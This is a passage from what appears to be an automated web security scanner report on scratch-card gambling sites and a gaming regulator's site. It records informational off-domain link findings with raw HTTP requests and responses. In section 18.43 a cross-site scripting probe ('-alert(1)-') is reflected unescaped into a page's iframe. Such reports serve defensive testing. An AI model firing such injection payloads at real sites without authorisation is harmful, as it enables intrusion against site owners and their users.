<area shape="rect" coords="0,0,55,35" href="UnderAge.aspx" target="_self" title="Responsible online gaming" alt="Responsible online gaming" /><area shape="rect" coords="65,0,150,35" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" target="_blank" title="Secure and Safe slot games" alt="Secure and Safe slot games" /><area shape="rect" coords="160,0,270,35" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" target="_blank" title="iTech Labs" alt="iTech Labs" /><area shape="rect" coords="280,0,445,35" href="http://www.neogames.com/" target="_blank" title="NeoGames.com" alt="NeoGames.com" /><area shape="rect" coords="460,0,545,35" href="http://www.gamblersanonymous.org/" target="_blank" title="Gamblers Anonymous" alt="Gamblers Anonymous" /><area shape="rect" coords="560,0,695,35" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&amp;GamingAuthority.pdf" target="_blank" title="Lotteries and Gaming Authority Malta" alt="Lotteries and Gaming Authority Malta" />
</map>
...[SNIP]...
ince May 2007). The Company...s registered address is at 135, High street, Sliema SLM 1549, Malta. The Company operates Karamba.com under a license issued and regulated by the
<a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank">
Lotteries and Gaming Authority
</a>
...[SNIP]...

18.41. http://www.lga.org.mt/lga/content.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lga.org.mt
Path:   /lga/content.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /lga/content.aspx?id=109045 HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=kpe2x045cuhwf145d5bbn545; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14976


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <title>LGA ::
           Licensed Operators: Class 4
       </title>
       <meta content=
...[SNIP]...
</a>--><a href="http://www.adobe.com/products/acrobat/readstep2.html" target="_blank">PDF
                           Reader</a> | <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash&amp;promoid=BIOW"
                           target="_blank">
Flash Player</a>
...[SNIP]...

18.42. https://www.neogamespartners.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neogamespartners.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /?CMI=1 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:46:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?CMI=1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<link rel="stylesheet" href="https://www.neogamespartners.com/wp-content/themes/NGP/style.css" type="text/css" media="screen" />
<script type="text/javascript" language="javascript" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/js/LoadFlash.js"></script>
...[SNIP]...
<p><img class="AffiliatesHomeRightContentTextImage aligncenter" style="cursor:pointer;" onclick="goto('sign-up');" onmouseover="this.src=&quot;https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/ApplyNowOver_eng.gif&quot;" onmouseout="this.src=&quot;https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/ApplyNow_eng.gif&quot;" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/ApplyNow_eng.gif" border="0" alt="" /><span class="AffiliatesHomeRightContentText" style="font-size:10px;">
...[SNIP]...
<td>
<img class="AffiliatesFooterSpamImage" border="0" src="https://download.neogames-tech.com/Companies/NeoGames/Affiliates/Website/Images/FooterSpam_eng.gif" alt="">
</td>
...[SNIP]...

18.43. http://www.okscratchcards.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /?70343%27-alert(1)-%2789d3bb43680=1 HTTP/1.1
Host: www.okscratchcards.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://burp/show/7
Cookie: __utma=80613129.1362500150.1305546536.1305546536.1305546536.1; __utmb=80613129.6.10.1305546536; __utmc=80613129; __utmz=80613129.1305546536.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; CSI_20=EncryptedUniqueVisitorID=2D7C0CC8562A483265BA53D772EFAEEE&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; UniqueVisitorID=2D7C0CC8562A483265BA53D772EFAEEE; LanguageCode=ENG; CountryCode=US; CSITemp=20

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12560
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Mon, 16 May 2011 12:42:14 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js" type="text/javascript"></script>
...[SNIP]...
<body>
<img src="http://ad-emea.doubleclick.net/ad/N5493.Ok/B4240999.6;abr=!ie4;abr=!ie5;sz=728x90;ord=[timestamp]?" style="display:none;" alt="Click Here"/>

<iframe src="http://home.okscratchcards.com/visit.aspx?csi=20&amp;LNG=~ENG&amp;70343'-alert(1)-'89d3bb43680=1" height="1" width="1" frameborder="0">
...[SNIP]...
<div id="logo">
<a href="http://www.ok.co.uk/home/">
<img src="images-dec-2010/ok-magazine.gif" width="244" height="122" alt="Ok! scratch Cards" />
...[SNIP]...

18.44. http://www.okscratchcards.com/terms-and-conditions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.okscratchcards.com
Path:   /terms-and-conditions.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /terms-and-conditions.aspx?& HTTP/1.1
Host: www.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 22740

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml"><head>


<title>
   
Online Scratch cards, featuring over 60 flash Scratch games and scratch off tickets &ndash; okscratc
...[SNIP]...
<link href="http://home.okscratchcards.com/Brands/okscratchcards/CSS/SkinCss.css" rel="stylesheet" type="text/css"><link href="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/favicon.ico" type="image/x-icon" rel="shortcut icon">
<style type="text/css">
...[SNIP]...
<a title="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, OKscratchcards.com" href="/">
            <img border="0" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, OKscratchcards.com" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/MasterHeader.jpg">
           </a>
...[SNIP]...
<br>
<a target="_blank" href="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/WeeklySchedule_ENG.html">
<img border="0" src="http://213.175.195.83/mac.jpg" alt=""></a>
...[SNIP]...
<a href="#" onclick="OpenLobby();"><img style="border: medium none ;" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/playnow_button_ENG.gif" alt=""></a>
...[SNIP]...
<param value="1" name="SeamlessTabbing">
<embed height="218" width="146" align="middle" flashvars="BASE=http://download.neogames-tech.com/OKscratchcards.com/Website/General/&amp;SKINNAME=OKscratchcards.com&amp;PAGENAME=Promotions&amp;CUR=GBP&amp;LNG=ENG&amp;CSI=&amp;AMOUNT=&amp;CURSYMALGN=L&amp;CURDIGITSYM=%2C&amp;CURDECIMALSYM=." pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" type="application/x-shockwave-flash" allowscriptaccess="always" quality="high" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/PromotionInnerTop_ENG_GBP.swf">


</div>
...[SNIP]...
<param value="1" name="SeamlessTabbing">
<embed height="218" width="146" align="middle" flashvars="BASE=http://download.neogames-tech.com/OKscratchcards.com/Website/General/&amp;SKINNAME=OKscratchcards.com&amp;PAGENAME=Promotions&amp;CUR=GBP&amp;LNG=ENG&amp;CSI=&amp;AMOUNT=&amp;CURSYMALGN=L&amp;CURDIGITSYM=%2C&amp;CURDECIMALSYM=." pluginspage="http://www.macromedia.com/go/getflashplayer" wmode="transparent" type="application/x-shockwave-flash" allowscriptaccess="always" quality="high" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/PromotionWinner.swf">


</div>
...[SNIP]...
<map name="footerMapping">
<area target="_blank" coords="200,0,286,50" alt="" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en">
<area target="_blank" coords="290,0,410,50" alt="" href="http://www.neogames.com/">
<area coords="414,0,450,50" alt="" href="UnderAge.aspx">
<area target="_blank" coords="454,0,545,50" alt="" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf">
<area target="_blank" coords="554,0,620,50" alt="" href="http://www.gamblersanonymous.org/">
<area target="_blank" coords="625,0,780,50" alt="" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&amp;GamingAuthority.pdf">
</map>
...[SNIP]...
<td class="FooterControlImageCell"><img border="0" usemap="#footerMapping" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/bottom.gif" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, OKscratchcards.com"></td>
...[SNIP]...
e EU since May 2007). The Company...s registered address is at 135, High street, Sliema SLM 1549, Malta. The Company operates okscratchcards.com under a provisional license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&amp;GamingAuthority.pdf" target="_blank">Lotteries and Gaming Authority</a>
...[SNIP]...

18.45. http://www.primescratchcards.com/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primescratchcards.com
Path:   /index.asp

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /index.asp?curr=USD&g=3 HTTP/1.1
Host: www.primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; __utmz=24585211.1305546129.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=24585211.1891246149.1305546129.1305546129.1305546129.1; ASPSESSIONIDCQTRSBSQ=MHLOLGNDAAEAPFOGJAHLFGCF; __utmc=24585211; __utmb=24585211.1.10.1305546129;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 29836
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:34:28 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:34:28 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<center><a href="http://www.facebook.com/PrimeScratchCards" target="_blank"><img src="images/side/197x100_FB.jpg" width="197" border="0">
...[SNIP]...
</a>
       <a href="http://www.youtube.com/user/primescratchcards1" target="_blank"><img src="http://www.primescratchcards.com/images/sn/tube.png" border="0"></a>
       <a href="http://www.facebook.com/pages/PrimeScratchCards/122783514413813" target="_blank"><img src="http://www.primescratchcards.com/images/sn/fbook.png" border="0"></a>
       <a href="http://twitter.com/PrimeScratch" target="_blank"><img src="http://www.primescratchcards.com/images/sn/tweet.png" border="0">
...[SNIP]...
<area shape="rect" coords="10,10,120,60" href="HelpDepositMethods.asp" alt="" title="" />
<area shape="rect" coords="125,10,208,60" href="http://www.gambleaware.co.uk/" target="_blank" alt="" title="" />
<area shape="rect" coords="338,9,419,59" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="" title="" />
<area shape="rect" coords="423,8,539,58" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" target="_blank" alt="" title="" />
<area shape="rect" coords="546,8,582,58" href="http://www.gamcare.org.uk/" target="_blank" alt="" title="" />
<area shape="rect" coords="631,4,724,54" href="http://www.lga.org.mt/" target="_blank" alt="" title="" />
<area shape="rect" coords="738,7,812,57" href="http://www.primegaming.com/" target="_blank" alt="" title="" />
<area shape="rect" coords="823,8,848,58" href="underage.asp" alt="" title="" />
...[SNIP]...
</script>

   <img src="https://r.openx.net/img?pixel_id=d16452704d09e96e4405f770efdd3465" width="1" height="1" />


   <!-- 03/09/2011 6:34PM Tamar Golan Advertiser 'Prime Online Ltd', Include user in segment 'PrimeOnLine_retarget' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
   <img src="http://ad.adserverplus.com/pixel?id=1216122&t=2" width="1" height="1" />
   <!-- End of segment tag -->
...[SNIP]...

18.46. http://www.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratch2cash.com
Path:   /Home.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Home.aspx?LanguageCode=ENG HTTP/1.1
Host: www.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSI_1=EncryptedUniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; CSITemp=1; ASP.NET_SessionId=s0o21j45kqjx1w45ngfpul55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:45:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: UniqueVisitorID=491CA5528E3D873E270DC2BAC25B5975; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:45:06 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/Scratch2Cash/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
</map>
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/MasterHeader_ENG.gif" usemap="#flagsMAp"/>
</td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
</a>
<a id="ctl00_cphHeader_objPageHeader_lnkAffiliate" class="HeaderFooterLinks" href="https://www.aspireaffiliates.com/?CMI=1" target="_blank">
&nbsp;|&nbsp; Affiliates</a>
...[SNIP]...
</span><a id="ctl00_cphFooter_objPageFooter_lnkAffiliate" class="HeaderFooterLinks" href="https://www.aspireaffiliates.com/?CMI=1" target="_blank">Affiliates</a>
...[SNIP]...
<MAP NAME="footerMapping">        
<area href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" alt="Secure and Safe Scratch Tickets" coords="215,15,284,50" target="_blank"/>
<area href="http://www.neogames.com/" alt="NeoGames.com" coords="300,15,412,50" target="_blank" />
<area href="UnderAge.aspx" alt="Responsible online gaming" coords="425,15,455,50"/>
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" alt="iTech Labs" coords="470,15,554,50" target="_blank" />
<area href="http://www.gamblersanonymous.org/" alt="Gamblers Anonymous" coords="565,15,627,50" target="_blank" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" alt="Lotteries and Gaming Authority Malta" coords="633,15,762,50" target="_blank" />
</MAP>
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/Scratch2Cash/Website/General/MasterFooter.gif" USEMAP="#footerMapping"/>

</div>
...[SNIP]...
May 2007). The Company’s registered address is at 135, High street, Sliema SLM 1549, Malta. The Company operates Scratch2Cash.com under a license issued and regulated by the
<a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank">
Lotteries and Gaming Authority
</a>
...[SNIP]...

18.47. http://www.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Home.aspx?LanguageCode=ENG HTTP/1.1
Host: www.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; LanguageCode=ENG; CSI_8=EncryptedUniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=8; ASP.NET_SessionId=2aexru55vqeu1tir5miil0au;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:30:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: UniqueVisitorID=6FCAF5F9C8D55EFDD0A192ACFD5E5CB6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:30:33 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44448


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/scratchcardheaven/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a href="/" title="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com">
            <img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/MasterHeader.gif" border="0" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com" />
           </a>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_tl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_tr.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_bl.gif" alt="Select Language"></td>
...[SNIP]...
<td class="lng-CornerCell" valign="top"><img src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/corner_br.gif" alt="Select Language"></td>
...[SNIP]...
<td><img border="0" class="topMenuSeparatorImage" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif" /></td>
...[SNIP]...
<td><img border="0" class="topMenuSeparatorImage" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif" /></td>
...[SNIP]...
<td><img border="0" class="topMenuSeparatorImage" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif" /></td>
...[SNIP]...
<td><img border="0" class="topMenuSeparatorImage" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif" /></td>
...[SNIP]...
<td><img border="0" class="topMenuSeparatorImage" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif" /></td>
...[SNIP]...
<td><img border="0" class="topMenuSeparatorImage" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/TopMenuSeparator.gif" /></td>
...[SNIP]...
<td>
    <a id="ctl00_cphHeader_objPageHeader_lnkAffiliate" class="HeaderLinks" href="http://www.heavenaffiliates.com" target="_blank">Affiliates</a>
...[SNIP]...
<a target="_self" onclick="OpenLobby();" href="#">
<img border="0" class="Home5FreeImage" border="0" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/Home/5free_ENG_USD.gif" />
</a>
...[SNIP]...
<a onclick="javascript: try{WriteToAnalytics('ContactUs_ENG.gif');}catch(err){}" href="ContactUsMail.aspx">
<img border="0" class="HomeContactUsImage" border="0" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/Home/ContactUs_ENG.gif" />
</a>
...[SNIP]...
<a target="_self" onclick="OpenLobby();" href="#">
<img border="0" class="HomeMainImage" border="0" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/Home/Main_ENG_USD.jpg" />
</a>
...[SNIP]...
</div>
<img width="146" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/Home/WinnersHeader_ENG_USD.gif" />
<script type="text/javascript">
...[SNIP]...
<MAP NAME=footerMapping>
<area href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" alt="" coords="200,0,286,50" target="_blank" />
<area href="http://www.neogames.com/" alt="" coords="290,0,410,50" target="_blank" />
<area href="UnderAge.aspx" alt="" coords="414,0,450,50" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" ALT="" coords="454,0,545,50" target="_blank" />
<area href="http://www.gamblersanonymous.org/" alt="" coords="554,0,620,50" target="_blank" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" alt="" coords="625,0,780,50" target="_blank" />
</MAP>
...[SNIP]...
<td class="FooterControlImageCell"><img alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, scratchcardheaven.com" border="0" src="http://download.neogames-tech.com/Brands/scratchcardheaven/Website/General/bottom.gif" USEMAP="#footerMapping" /></td>
...[SNIP]...
ber of the EU since May 2007). The Company’s registered address is at 135, High street, Sliema SLM 1549, Malta. The Company operates scratchcardheaven.com under a license issued and regulated by the <a class="ContentLinks" target="_blank" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf">Lotteries and Gaming Authority</a>
...[SNIP]...

18.48. http://www.trustlogo.com/ttb_searcher/trustlogo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trustlogo.com
Path:   /ttb_searcher/trustlogo

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ttb_searcher/trustlogo?v_querytype=W&v_shortname=SC2&v_search=www.norskelodd.com&x=6&y=5 HTTP/1.1
